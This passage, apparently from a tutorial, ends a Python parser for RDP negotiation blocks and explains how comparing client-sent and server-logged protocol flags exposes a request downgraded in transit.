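    if neg_type not in NEG_TYPES or length != 8:
        raise NegotiationError("malformed negotiation block")
    result["neg_type"] = NEG_TYPES[neg_type]
    result["value"] = value
    # For RDP_NEG_FAILURE the value is a failure code, not a protocol field.
    result["protocols"] = [] if neg_type == 0x03 else protocol_names(value)
    return result


if __name__ == "__main__":
    print(parse_negotiation(CLIENT_REQUEST))
    print(parse_negotiation(SERVER_CONFIRM))
    print("removed by the 11 -> 3 rewrite:", removed_protocols(11, 3))
```

Comparing the `value` a client sent with the one the server logged is one way to spot a rewritten request: the flags returned by `removed_protocols` are the ones stripped in transit.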
